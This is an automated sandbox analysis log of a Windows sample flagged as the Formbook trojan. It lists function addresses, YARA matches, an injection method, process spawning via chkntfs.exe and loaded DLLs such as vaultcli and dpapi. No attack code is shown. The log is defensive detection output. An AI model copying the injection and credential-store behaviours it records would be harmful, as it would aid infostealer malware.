Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047D1460	14_2_047D1460
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489F43F	14_2_0489F43F
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0487D5B0	14_2_0487D5B0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048A95C3	14_2_048A95C3
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04897571	14_2_04897571
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048916CC	14_2_048916CC
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04825630	14_2_04825630
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489F7B0	14_2_0489F7B0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0488F0CC	14_2_0488F0CC
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048970E9	14_2_048970E9
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489F0E0	14_2_0489F0E0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047E70C0	14_2_047E70C0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047CF172	14_2_047CF172
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047EB1B0	14_2_047EB1B0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048AB16B	14_2_048AB16B
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0481516C	14_2_0481516C
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048812ED	14_2_048812ED
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047FB2C0	14_2_047FB2C0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047E52A0	14_2_047E52A0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0482739A	14_2_0482739A
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047CD34C	14_2_047CD34C
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489132D	14_2_0489132D
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489FCF2	14_2_0489FCF2
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04859C32	14_2_04859C32
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047E3D40	14_2_047E3D40
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047FFDC0	14_2_047FFDC0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04891D5A	14_2_04891D5A
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04897D73	14_2_04897D73
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047E9EB0	14_2_047E9EB0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489FFB1	14_2_0489FFB1
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489FF09	14_2_0489FF09
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047A3FD2	14_2_047A3FD2
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047A3FD5	14_2_047A3FD5
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047E1F92	14_2_047E1F92
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0484D800	14_2_0484D800
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047E38E0	14_2_047E38E0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047E9950	14_2_047E9950
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047FB950	14_2_047FB950
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04875910	14_2_04875910
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04825AA0	14_2_04825AA0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0487DAAC	14_2_0487DAAC
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04881AA3	14_2_04881AA3
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0488DAC6	14_2_0488DAC6
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489FA49	14_2_0489FA49
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04897A46	14_2_04897A46
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04853A6C	14_2_04853A6C
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04855BF0	14_2_04855BF0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0481DBF9	14_2_0481DBF9
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489FB76	14_2_0489FB76
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047FFB80	14_2_047FFB80
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_005A19A0	14_2_005A19A0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_005BA410	14_2_005BA410
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0059CB70	14_2_0059CB70
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0059CB68	14_2_0059CB68
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0059CD90	14_2_0059CD90
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0059AE10	14_2_0059AE10
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0059AF55	14_2_0059AF55
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0059AFE9	14_2_0059AFE9
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_005A34F0	14_2_005A34F0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_045FC11C	14_2_045FC11C
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_045FB188	14_2_045FB188
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_045FBC67	14_2_045FBC67
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_045FBD83	14_2_045FBD83

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: String function: 012F7E54 appears 111 times
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: String function: 0131EA12 appears 86 times
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: String function: 0129B970 appears 277 times
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: String function: 012E5130 appears 58 times
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: String function: 0132F290 appears 105 times
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: String function: 04815130 appears 58 times
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: String function: 0484EA12 appears 86 times
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: String function: 04827E54 appears 111 times
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: String function: 0485F290 appears 105 times
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: String function: 047CB970 appears 277 times

Sample file is different than original file name gathered from version info

Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1239382924.000000000099E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 8hd98EhtIFcYkb8.exe
Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1241401720.000000000390E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 8hd98EhtIFcYkb8.exe
Source: 8hd98EhtIFcYkb8.exe, 00000000.00000000.1229629788.00000000003E8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameOgps.exe, vs 8hd98EhtIFcYkb8.exe
Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1250425384.0000000006B30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs 8hd98EhtIFcYkb8.exe
Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1250744676.00000000072F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 8hd98EhtIFcYkb8.exe
Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1240108906.0000000002788000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs 8hd98EhtIFcYkb8.exe
Source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431730936.0000000000E17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCHKNTFS.EXEj% vs 8hd98EhtIFcYkb8.exe
Source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431995842.000000000139D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 8hd98EhtIFcYkb8.exe
Source: 8hd98EhtIFcYkb8.exe	Binary or memory string: OriginalFilenameOgps.exe, vs 8hd98EhtIFcYkb8.exe

Uses 32bit PE files

Source: 8hd98EhtIFcYkb8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: 8hd98EhtIFcYkb8.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EuOdzX7Ehz6t1H3[1].exe.14.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: aj34fjqh.exe.14.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, A297vOAUIe0qEnXTYd.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, A297vOAUIe0qEnXTYd.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.cs	Security API names: _0020.SetAccessControl
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.cs	Security API names: _0020.AddAccessRule
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.cs	Security API names: _0020.SetAccessControl
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.cs	Security API names: _0020.AddAccessRule
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.cs	Security API names: _0020.SetAccessControl
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.cs	Security API names: _0020.AddAccessRule
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, A297vOAUIe0qEnXTYd.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.8hd98EhtIFcYkb8.exe.28f4678.4.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.8hd98EhtIFcYkb8.exe.68c0000.7.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.8hd98EhtIFcYkb8.exe.2915848.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/5@16/14

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8hd98EhtIFcYkb8.exe.log

Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: unknown	Process created: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process created: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	Process created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
Source: C:\Windows\SysWOW64\chkntfs.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\chkntfs.exe	Process created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process created: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	Process created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"	Jump to behavior

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	Section loaded: wininet.dll	Jump to behavior
